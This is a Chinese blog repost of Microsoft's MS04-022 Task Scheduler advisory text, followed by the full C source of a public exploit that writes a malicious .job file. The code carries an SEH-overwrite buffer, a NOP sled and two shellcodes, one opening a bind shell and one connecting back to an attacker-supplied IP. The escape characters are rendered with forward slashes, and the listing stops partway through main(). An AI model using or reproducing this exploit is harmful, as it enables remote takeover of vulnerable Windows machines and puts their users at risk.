Microsoft 安全公告 MS04-022 溢出攻击代码

最新推荐文章于 2024-08-15 02:50:52 发布

yztgx

最新推荐文章于 2024-08-15 02:50:52 发布

阅读量1.8k

点赞数

分类专栏：搜刮文章标签： microsoft 公告 fp windows 任务 header

本文链接：https://blog.csdn.net/yztgx/article/details/57791

版权

搜刮专栏收录该内容

25 篇文章 0 订阅

订阅专栏

Microsoft 安全公告 MS04-022 溢出攻击代码

漏洞描述
任务计划程序漏洞 — CAN-2004-0212

此漏洞的影响范围有多大？
这是一个远程执行代码漏洞。如果用户使用管理权限登录，成功利用此漏洞的攻击者可以完全控制受影响的系统，包括安装程序；查看、更改或删除数据；或者创建拥有完全权限的新帐户。那些帐户被配置为拥有较少系统权限的用户比具有管理权限的用户受到的威胁要小。不过，要利用此漏洞，需要进行用户交互。

此漏洞因何而起？
任务计划程序组件中未经检查的缓冲区。

什么是任务计划程序？
您可以使用任务计划程序，计划在特定时间运行命令、程序或脚本。可将任务保存为具有 .job 文件扩展名的文件。这样，就可以更方便地在系统之间移动任务信息。管理员可以创建计划的维护任务文件，并将其放在需要的地方。有关详细信息，请参见任务计划程序 Web 站点。

攻击者可能利用此漏洞执行什么操作？
成功利用此漏洞的攻击者可以完全控制受影响的系统，其中包括：安装程序；查看、更改或删除数据；或者创建拥有完全权限的新帐户等。

攻击者如何利用此漏洞？
攻击者可能使用多种方法来攻击系统。下面是一些示例：

? 攻击者可能拥有一个旨在通过 Internet Explorer 利用此漏洞的恶意 Web 站点，然后诱使用户查看这个 Web 站点。

? 攻击者可能将特制 .job 文件添加到本地文件系统或网络共享上，然后诱使用户使用 Windows 资源管理器来查看该文件夹。

? 攻击者也可能通过其他媒介访问受影响的组件。例如，攻击者可以通过交互方式登录到系统上，或者使用其他程序将参数传递给容易受到攻击的组件（本地或远程）以登录到系统上。

Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)

/* HOD-ms04022-task-expl.c:
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
*
* Exploit version 0.1 coded by
*
*
*                 .::[ houseofdabus ]::.
*
*
* [at inbox dot ru]
* -------------------------------------------------------------------
* Tested on:
*    - Internet Explorer 6.0 (SP1) (iexplore.exe)
*    - Explorer (explorer.exe)
*    - Windows XP SP0, SP1
*
* -------------------------------------------------------------------
* Compile:
*    Win32/VC++ : cl HOD-ms04022-task-expl.c
*    Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
*    Linux       : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
*
* -------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
*   HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
*
*   Shellcode:
*        1 - Portbind shellcode
*        2 - Connectback shellcode
*
* -------------------------------------------------------------------
* Example:
*
* C:/>HOD-ms04022-task-expl.exe expl.job 1 7777
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
*
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Shellcode: Portbind, port = 7777
* [*] Generate file: expl.job
*
* C:/>
*
* start IE -> C:/
*
* C:/>telnet localhost 7777
* Microsoft Windows XP [偉噌 5.1.2600]
* (? 姰喁 妯??nbsp;┆喈岙溻, 1985-2001.
*
* C:/Documents and Settings/v.X/?nbsp;‘绋?徕>
*
* -------------------------------------------------------------------
*
*   This is provided as proof-of-concept code only for educational
*   purposes and testing by authorized individuals with permission to
*   do so.
*
*/

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>

#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#include <winsock2.h>

#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif

unsigned char jobfile[] =

/* job header */
"/x01/x05/x01/x00/xD9/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF/xFF"
"/xFF/xFF/xFF/xFF/x46/x00/x92/x00/x00/x00/x00/x00/x3C/x00/x0A/x00"
"/x20/x00/x00/x00/x00/x14/x73/x0F/x00/x00/x00/x00/x03/x13/x04/x00"
"/xC0/x00/x80/x21/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00"
"/x00/x00/x00/x00/x00/x00"

/* length */
"/x11/x11"

/* garbage C:/... */
/* unicode */
"/x43/x00/x3A/x00/x5C/x00/x61/x00"
"/x2E/x00/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"
"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"

"/x1E/x82/xDC/x77"

/* 0x77dc821e - pop reg, pop reg, ret (advapi32.dll) */
/* for Win2k use jmp ebx or call ebx */

"/x61/x61/x61/x61/x61/x61/x61/x61/x61/x61/x61/x61"
"/x80/x31/x31/x80" /* generate exception */

"/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00/x61/x00"
"/x90/x90";

/* portbind shellcode */
unsigned char portbindsc[] =
"/x90/x90"
"/x90/x90/xEB/x06" /* overwrite SEH-frame */
"/x90/x90"
"/x90/x90/x90/x90"
"/x90/x90/x90/x90"

"/xeb/x70/x56/x33/xc0/x64/x8b/x40/x30/x85/xc0/x78/x0c/x8b/x40/x0c"
"/x8b/x70/x1c/xad/x8b/x40/x08/xeb/x09/x8b/x40/x34/x8d/x40/x7c/x8b"
"/x40/x3c/x5e/xc3/x60/x8b/x6c/x24/x24/x8b/x45/x3c/x8b/x54/x05/x78"
"/x03/xd5/x8b/x4a/x18/x8b/x5a/x20/x03/xdd/xe3/x34/x49/x8b/x34/x8b"
"/x03/xf5/x33/xff/x33/xc0/xfc/xac/x84/xc0/x74/x07/xc1/xcf/x0d/x03"
"/xf8/xeb/xf4/x3b/x7c/x24/x28/x75/xe1/x8b/x5a/x24/x03/xdd/x66/x8b"
"/x0c/x4b/x8b/x5a/x1c/x03/xdd/x8b/x04/x8b/x03/xc5/x89/x44/x24/x1c"
"/x61/xc3/xeb/x3d/xad/x50/x52/xe8/xa8/xff/xff/xff/x89/x07/x83/xc4"
"/x08/x83/xc7/x04/x3b/xf1/x75/xec/xc3/x8e/x4e/x0e/xec/x72/xfe/xb3"
"/x16/x7e/xd8/xe2/x73/xad/xd9/x05/xce/xd9/x09/xf5/xad/xa4/x1a/x70"
"/xc7/xa4/xad/x2e/xe9/xe5/x49/x86/x49/xcb/xed/xfc/x3b/xe7/x79/xc6"
"/x79/x83/xec/x60/x8b/xec/xeb/x02/xeb/x05/xe8/xf9/xff/xff/xff/x5e"
"/xe8/x3d/xff/xff/xff/x8b/xd0/x83/xee/x36/x8d/x7d/x04/x8b/xce/x83"
"/xc1/x10/xe8/x9d/xff/xff/xff/x83/xc1/x18/x33/xc0/x66/xb8/x33/x32"
"/x50/x68/x77/x73/x32/x5f/x8b/xdc/x51/x52/x53/xff/x55/x04/x5a/x59"
"/x8b/xd0/xe8/x7d/xff/xff/xff/xb8/x01/x63/x6d/x64/xc1/xf8/x08/x50"
"/x89/x65/x34/x33/xc0/x66/xb8/x90/x01/x2b/xe0/x54/x83/xc0/x72/x50"
"/xff/x55/x24/x33/xc0/x50/x50/x50/x50/x40/x50/x40/x50/xff/x55/x14"
"/x8b/xf0/x33/xc0/x33/xdb/x50/x50/x50/xb8/x02/x01/x11/x5c/xfe/xcc"
"/x50/x8b/xc4/xb3/x10/x53/x50/x56/xff/x55/x18/x53/x56/xff/x55/x1c"
"/x53/x8b/xd4/x2b/xe3/x8b/xcc/x52/x51/x56/xff/x55/x20/x8b/xf0/x33"
"/xc9/xb1/x54/x2b/xe1/x8b/xfc/x57/x33/xc0/xf3/xaa/x5f/xc6/x07/x44"
"/xfe/x47/x2d/x57/x8b/xc6/x8d/x7f/x38/xab/xab/xab/x5f/x33/xc0/x8d"
"/x77/x44/x56/x57/x50/x50/x50/x40/x50/x48/x50/x50/xff/x75/x34/x50"
"/xff/x55/x08/xf7/xd0/x50/xff/x36/xff/x55/x10/xff/x77/x38/xff/x55"
"/x28/xff/x55/x0c";

/* connectback shellcode */
unsigned char connectbacksc[] =
"/x90/x90"
"/x90/x90/xEB/x06" /* overwrite SEH-frame */
"/x90/x90"
"/x90/x90/x90/x90"
"/x90/x90/x90/x90"

"/xeb/x70/x56/x33/xc0/x64/x8b/x40/x30/x85/xc0/x78/x0c/x8b/x40/x0c"
"/x8b/x70/x1c/xad/x8b/x40/x08/xeb/x09/x8b/x40/x34/x8d/x40/x7c/x8b"
"/x40/x3c/x5e/xc3/x60/x8b/x6c/x24/x24/x8b/x45/x3c/x8b/x54/x05/x78"
"/x03/xd5/x8b/x4a/x18/x8b/x5a/x20/x03/xdd/xe3/x34/x49/x8b/x34/x8b"
"/x03/xf5/x33/xff/x33/xc0/xfc/xac/x84/xc0/x74/x07/xc1/xcf/x0d/x03"
"/xf8/xeb/xf4/x3b/x7c/x24/x28/x75/xe1/x8b/x5a/x24/x03/xdd/x66/x8b"
"/x0c/x4b/x8b/x5a/x1c/x03/xdd/x8b/x04/x8b/x03/xc5/x89/x44/x24/x1c"
"/x61/xc3/xeb/x35/xad/x50/x52/xe8/xa8/xff/xff/xff/x89/x07/x83/xc4"
"/x08/x83/xc7/x04/x3b/xf1/x75/xec/xc3/x8e/x4e/x0e/xec/x72/xfe/xb3"
"/x16/x7e/xd8/xe2/x73/xad/xd9/x05/xce/xd9/x09/xf5/xad/xec/xf9/xaa"
"/x60/xcb/xed/xfc/x3b/xe7/x79/xc6/x79/x83/xec/x60/x8b/xec/xeb/x02"
"/xeb/x05/xe8/xf9/xff/xff/xff/x5e/xe8/x45/xff/xff/xff/x8b/xd0/x83"
"/xee/x2e/x8d/x7d/x04/x8b/xce/x83/xc1/x10/xe8/xa5/xff/xff/xff/x83"
"/xc1/x10/x33/xc0/x66/xb8/x33/x32/x50/x68/x77/x73/x32/x5f/x8b/xdc"
"/x51/x52/x53/xff/x55/x04/x5a/x59/x8b/xd0/xe8/x85/xff/xff/xff/xb8"
"/x01/x63/x6d/x64/xc1/xf8/x08/x50/x89/x65/x30/x33/xc0/x66/xb8/x90"
"/x01/x2b/xe0/x54/x83/xc0/x72/x50/xff/x55/x1c/x33/xc0/x50/x50/x50"
"/x50/x40/x50/x40/x50/xff/x55/x14/x8b/xf0/x68/x7f/x01/x01/x01/xb8"
"/x02/x01/x11/x5c/xfe/xcc/x50/x8b/xdc/x33/xc0/xb0/x10/x50/x53/x56"
"/xff/x55/x18/x33/xc9/xb1/x54/x2b/xe1/x8b/xfc/x57/x33/xc0/xf3/xaa"
"/x5f/xc6/x07/x44/xfe/x47/x2d/x57/x8b/xc6/x8d/x7f/x38/xab/xab/xab"
"/x5f/x33/xc0/x8d/x77/x44/x56/x57/x50/x50/x50/x40/x50/x48/x50/x50"
"/xff/x75/x30/x50/xff/x55/x08/xf7/xd0/x50/xff/x36/xff/x55/x10/xff"
"/x77/x38/xff/x55/x20/xff/x55/x0c";

/* use this form
unsigned char sc[] =
"/x90/x90"
"/x90/x90/xEB/x06" - overwrite SEH-frame
"/x90/x90"
"/x90/x90/x90/x90"
"/x90/x90/x90/x90"

"... code ...";
*/

unsigned char endofjob[] = "/x00/x00/x00/x00";

#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300+16)) = (port)
#define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+283+16)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290+16)) = (port)

void
usage(char *prog)
{
printf("Usage:/n");
printf("%s <file> <shellcode> <bind/connectback port> [connectback IP]/n", prog);
printf("/nShellcode:/n");
printf(" 1 - Portbind shellcode/n");
printf(" 2 - Connectback shellcode/n/n");
exit(0);
}

int
main(int argc, char **argv)
{
unsigned short strlen;
unsigned short port;
unsigned long ip, sc;
FILE *fp, *fp2;

printf("/n(MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit/n/n");
printf("--- Coded by .::[ houseofdabus ]::. ---/n/n");

if (argc < 4) usage(argv[0]);

sc = atoi(argv[2]);
if ( ((sc == 2) && (argc < 5)) || (sc > 2)) usage(argv[0]);

fp = fopen(argv[1], "wb");
if (fp == NULL) {
printf("[-] error: can/'t create file: %s/n", argv[1]);
exit(0);
}

/* header & garbage */
fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
fseek(fp, 39*16, SEEK_SET);

port = atoi(argv[3]);
printf("[*] Shellcode: ");
if (sc == 1) {
  SET_PORTBIND_PORT(portbindsc, htons(port));
  printf("Portbind, port = %u/n", port);
  fwrite(portbindsc, 1, sizeof(portbindsc)-1, fp);
  fwrite(endofjob, 1, 4, fp);
  fseek(fp, 70, SEEK_SET);
  /* calculate length (see header) */
  strlen = (sizeof(jobfile)-1-71+sizeof(portbindsc)-1+4)/2;
}
else {
  ip = inet_addr(argv[4]);
  SET_CONNECTBACK_IP(connectbacksc, ip);
  SET_CONNECTBACK_PORT(connectbacksc, htons(port));
  printf("Connectback, port = %u, IP = %s/n", port, argv[4]);
  fwrite(connectbacksc, 1, sizeof(connectbacksc)-1, fp);
  fwrite(endofjob, 1, 4, fp);
  fseek(fp, 70, SEEK_SET);
  /* calculate length (see header) */
  strlen = (sizeof(jobfile)-1-71+sizeof(connectbacksc)-1+4)/2;
}